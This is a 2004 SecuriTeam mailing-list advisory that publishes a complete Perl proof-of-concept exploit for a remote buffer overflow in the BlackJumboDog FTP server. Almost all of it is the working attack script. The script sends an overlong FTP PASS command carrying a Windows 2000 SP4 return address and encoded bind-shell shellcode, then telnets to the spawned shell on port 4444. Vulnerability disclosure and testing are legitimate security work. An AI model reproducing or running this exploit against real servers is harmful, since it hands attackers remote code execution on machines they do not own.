[EXPL] BlackJumboDog Remote Buffer Overflow Exploit Code

• Previous message: SecuriTeam: "[NT] Webbsyte Chat DoS Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 4 Aug 2004 23:20:43 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  BlackJumboDog Remote Buffer Overflow Exploit Code
------------------------------------------------------------------------

SUMMARY

A remote buffer overflow was found and reported in our previously featured
article ' <http://www.securiteam.com/windowsntfocus/5AP040ADPW.html>
BlackJumboDog FTP Server Buffer Overflow'.

The following proof-of-concept script can help test the vulnerability
against potentially vulnerable servers.

DETAILS

Exploit:

#!/usr/bin/perl
#
# blackJumboDog Exploit code by Tal zeltzer
#

use strict;
use IO::Socket::INET;

usage() unless(@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444
Size=399 ] http://metasploit.com
my $shellcode =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85".
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19".
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05".
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0".
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74".
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15".
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14".
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53".
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce".
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf".
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb".
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18".
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6".
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16".
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f".
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c".
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18".
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f".
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8".
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e".
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f".
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27".
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2".
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a".
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

my $socket =
IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$host,PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

print "[+] Connected to host\r\n";

$socket->autoflush(1);

#receive banner

my $repcode = "220 ";
my $response = recv_reply($socket,$repcode);

#send USER command

my $username = "anonymous";
print $socket "USER $username\r\n";

$repcode = "";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec

#Send PASS Command ( Evil Buffer )
# EIP At 308
# 7C4E2F60 - jmp ebx On kernel32.dll ( Windows 2000 SP4 )

printf "[+] Sending shellcode\r\n";

my $buf = "A"x308;
$buf = $buf . "\xEB\x06\xEB\x06"; # Jump 6 bytes forward
$buf = $buf . "\x60\x2F\x4E\x7C";
$buf = $buf . $shellcode;
print $socket "PASS $buf\r\n";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec

$repcode = "";
recv_reply($socket, $repcode);

close($socket);

system("telnet $host 4444");

exit(0);

sub usage
{
# print usage information
print "\nUsage: jumbo.pl <host> <port>\n
<host> - The host to connect to
<port> - The TCP port\n\n";
exit(1);
}

sub recv_reply
{
# retrieve any reply
my $socket = shift;
my $repcode = shift;
$socket or die "Can't receive on socket\n";

my $res="";
while(<$socket>)
{
$res .= $_;
if (/$repcode/) { last; }
}
return $res;
}

ADDITIONAL INFORMATION

The information has been provided by Tal Zeltzer of
<mailto:expert@securiteam.com> SecuriTeam Experts.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] Webbsyte Chat DoS Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]